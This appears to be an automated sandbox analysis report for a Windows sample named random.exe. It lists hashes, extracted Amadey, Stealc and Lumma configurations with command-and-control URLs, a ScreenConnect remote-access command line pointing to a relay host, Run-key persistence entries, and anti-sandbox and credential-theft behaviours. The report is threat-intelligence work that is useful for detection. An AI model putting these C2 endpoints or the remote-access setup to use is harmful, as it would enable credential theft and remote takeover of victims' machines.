Analysis
-
max time kernel
300s -
max time network
301s -
platform
windows7_x64 -
resource
win7-20240903-it -
resource tags
arch:x64arch:x86image:win7-20240903-itlocale:it-itos:windows7-x64systemwindows -
submitted
08-02-2025 15:31
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win7-20240903-it
Behavioral task
behavioral2
Sample
random.exe
Resource
win10ltsc2021-20250207-it
Behavioral task
behavioral3
Sample
random.exe
Resource
win11-20250207-it
General
-
Target
random.exe
-
Size
1.8MB
-
MD5
5b7618b4200c4288b830a4c0bbe23348
-
SHA1
5676c7ed0d9203a7ffe9197bae7da5f85c56106b
-
SHA256
9f7d849e26b45382639da7c45256fbe0963ce63554bb9c8b20dfa9216c9947bd
-
SHA512
a914c364f053aafb85d4fdaefa9d046a498713d4bf78bf4d0bdb286cc921f6d5160d5a1a7a4f101b46aac4e67e295e7a1a954e9573d95457df7b37a4ab21fd78
-
SSDEEP
49152:8/08HRt4iYyXvvCLN8ZnysbKFHiY8VnVfut:8/0C+9yyN8EfFCZVc
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://modernakdventure.cyou/api
Signatures
-
Amadey family
-
Detect Vidar Stealer 12 IoCs
resource yara_rule behavioral1/memory/2044-1050-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/2044-1069-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/2044-1090-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/2044-1093-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/2044-1096-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/2044-1220-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/2044-1290-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/2044-1314-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/2044-1317-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/2044-1320-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/2044-1343-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/2044-1447-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 -
Lumma family
-
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 90c94e737e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 74d6db97b4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Bjkm5hE.exe -
Downloads MZ/PE file 6 IoCs
flow pid Process 3 2772 axplong.exe 3 2772 axplong.exe 46 1256 skotes.exe 46 1256 skotes.exe 46 1256 skotes.exe 102 2772 axplong.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (73a0227d089fe193)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (73a0227d089fe193)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=relay.ssahelponline.ru&p=443&s=885f8628-eb83-437c-8a46-251b07f085ee&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA%2fFgVdcSkY0eGWDtEAKQ6wQAAAAACAAAAAAAQZgAAAAEAACAAAADeCEgEHKRFKi9aSEuvVPVK7tNeXYqncD4hF6uJfvTOhAAAAAAOgAAAAAIAACAAAABB3U2cs%2fymZ3PDHQEk%2blopNdL8EoypEDfbci%2fulOR336AEAAChl8YppvPpWUC1DfHV9t1qmNK1oOzj%2fDpS2phW0l%2ff4oKPZud4Xw1ltkVEx3ky%2b0%2b5SxCtNqdnrqRHt5dN0ELnHV2MWdB33T4QNPTptOHGN7%2f58mFjhAuyjWzahRy1S%2fYKUh%2b2UgrjUkjSyvCAx8B%2feNVYn3MJtvMcbdspTVKQBgqM2ewxFLl43ygSXX7iCjqSMwItKdC%2b%2ffPEqswy7qxUd%2fYAnSdxREn63w0uC56G58vnVnTCctFNYo2JTVepIfgRHKmt6JprSM06sBYsAVcGx8EOi8oj2JQ65vYIctJ3hc911s%2f29MNADfBXM5awjaKZaeC55B9TaTQROYds8muYgbk4BxgCdTRw8%2fP6wrbCoHyMbhncko6%2bef3yu9UU%2bVW80L7KSJ1oQQX%2bYBbuQi6YMITDMOM70EsC%2fzKTMae8LByrabUeUuLW3os1%2beCdrykEzuHhca4gg%2b%2bPZ2JWXr8DEgJuf9yxq0%2bxLkl3%2b1BmcE4vkRS%2fGu%2bu72SBBaD84Hgtg64P2PGelAvi9bwZXy0VB3Kor2%2bB2F3yq6SCSG8XYBDwPS6GJbZetXKGzLSG%2by44l%2fdm6nt2cXC%2b1Gvo2RFZFs%2b0RfkNE7Hv%2fJJaT%2bqfeTDZ0K8D6afv5T2kCuXCS118W1ylxrV3z7d0R5LODczuUu1%2fv%2fIKv5TBdeFk81C0QzffRYKc%2bkbttyT78RcC4jhNwsc%2f9RjyTq0zYUFOylzlN72XP0uqFzgrzNUoO18%2f9dJ1p9xrD%2bRg7qrF6vFM%2bMJLg%2bJOe%2fD75VH8bCqzkBtkuUpp8ITHE9QhODdUcAgwHkWMXpSg7vSMdBJ1pVH88klFq4JXoytKO8bQ6VHwJKoSRQdufcuvSYuNcn8yUhPpXo2iE8ak6voVxYRQ1DF1sM6XFhYEZYsXeerPY6XrsMqC45z2ZGwVaTIv9KKdoCJ7B%2bl5sE3CVVmepJ6%2bLWQ9fClA%2by%2f3Wo7aV606VFOxRKq%2bA%2b2Gap8ugwhpd2kLazmc2Pb%2fhZ4QSP5x8i91XM8c%2brRM2LiuYDDX2Fwfas5TXKfvkiuNm7Dj1pO6heTSHE99bZW4QPEbHpyZAKH0pMYeO%2b0KKLnNOCP%2fgPZQb%2ft6NWSpL4IEGd2wMsqofbIifR51hUAxhtjL8ykEk%2bWd%2bIwOnTwM%2b7z2TUWTjWwORjJVzhaFiz5qLWzz%2bloIW8C%2bSH4jmnMfjwlTCIGKBryiu%2b68MlArmGmFn0zwHa9YIxgTjrWZTeUcV98%2bsC1SeEgfu8hSWYARmqb4lTAmcQ1RTjCk%2bJyWsGDSRq6i5vAlw57IddX2uWJAVujXzkXww7wNearzoyKge0ZPdlZDssBTOXAqxZ3yJSC2ABy2MBWI00Gg%2fiVO4baa2G%2fqASKFXreWmUDjWt4dYx9su4xEjHwYxuXuuw9TBBBwWL0pRXT1zzDgjfe%2b6SQPrCLVv8DunLhqQ68WciY3xj8TdgXGbu7kIcMimyi4NIudUXzQowaTlBne9%2fkSzVGpYFDZxlAN2UUhD1PWvRwx%2fj4KLmTCJnuLoEAFqh44EUsTJ%2b%2fhucEdkxkaD%2fhpjToSMmsiUEKxnl6SxqrfwkAAAABPELUJYnCZ9%2baaQuFgwziwmRi%2fnP4qFdNINjQa6HP1EPhf898WEtBlQ%2bCBmWmiwTvOqiQDvZWZQ%2bthfhnNyyAa&c=mm&c=mm&c=mm&c=mm&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 952 chrome.exe 2364 chrome.exe 2636 chrome.exe 488 chrome.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x0005000000019263-915.dat net_reactor behavioral1/memory/1300-925-0x0000000000E30000-0x0000000000EF8000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 90c94e737e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Bjkm5hE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Bjkm5hE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 90c94e737e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 74d6db97b4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 74d6db97b4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 11 IoCs
pid Process 2772 axplong.exe 2816 90c94e737e.exe 2784 74d6db97b4.exe 1256 skotes.exe 1300 1AWhJsY.exe 2500 1AWhJsY.exe 2044 Bjkm5hE.exe 2880 cBeNU75.exe 2228 ScreenConnect.ClientService.exe 2856 ScreenConnect.WindowsClient.exe 2256 ScreenConnect.WindowsClient.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 90c94e737e.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 74d6db97b4.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine Bjkm5hE.exe -
Loads dropped DLL 40 IoCs
pid Process 2744 random.exe 2744 random.exe 2772 axplong.exe 2772 axplong.exe 2772 axplong.exe 2772 axplong.exe 2784 74d6db97b4.exe 2784 74d6db97b4.exe 1256 skotes.exe 1300 1AWhJsY.exe 2240 WerFault.exe 2240 WerFault.exe 2240 WerFault.exe 2240 WerFault.exe 2240 WerFault.exe 1256 skotes.exe 1256 skotes.exe 2940 MsiExec.exe 2436 rundll32.exe 2436 rundll32.exe 2436 rundll32.exe 2436 rundll32.exe 2436 rundll32.exe 2436 rundll32.exe 2436 rundll32.exe 2812 MsiExec.exe 2972 MsiExec.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\90c94e737e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1019175001\\90c94e737e.exe" axplong.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\74d6db97b4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1019176001\\74d6db97b4.exe" axplong.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\DriverStore\FileRepository\volsnap.inf_amd64_neutral_7499a4fac85b39fc\volsnap.PNF DrvInst.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (73a0227d089fe193)\uhy45ban.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (73a0227d089fe193)\uhy45ban.newcfg ScreenConnect.ClientService.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 2744 random.exe 2772 axplong.exe 2816 90c94e737e.exe 2784 74d6db97b4.exe 1256 skotes.exe 2044 Bjkm5hE.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1300 set thread context of 2500 1300 1AWhJsY.exe 38 -
Drops file in Program Files directory 16 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.Override.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe msiexec.exe -
Drops file in Windows directory 18 IoCs
description ioc Process File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Installer\f7a5c54.ipi msiexec.exe File opened for modification C:\Windows\Installer\{BF338381-FA8C-4707-BAB5-F07F740C9A8B}\DefaultIcon msiexec.exe File created C:\Windows\Installer\wix{BF338381-FA8C-4707-BAB5-F07F740C9A8B}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Installer\{BF338381-FA8C-4707-BAB5-F07F740C9A8B}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\axplong.job random.exe File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe File opened for modification C:\Windows\INF\volsnap.PNF DrvInst.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI5D4D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5D5D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5F43.tmp msiexec.exe File created C:\Windows\Installer\f7a5c56.msi msiexec.exe File created C:\Windows\Tasks\skotes.job 74d6db97b4.exe File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File created C:\Windows\Installer\f7a5c53.msi msiexec.exe File opened for modification C:\Windows\Installer\f7a5c53.msi msiexec.exe File opened for modification C:\Windows\Installer\f7a5c54.ipi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2240 1300 WerFault.exe 37 -
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 90c94e737e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cBeNU75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1AWhJsY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 74d6db97b4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1AWhJsY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Bjkm5hE.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Bjkm5hE.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 53 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\FE2848FA msiexec.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\FE2848FA\LanguageList = 690074002d0049005400000069007400000065006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe -
Modifies registry class 37 IoCs
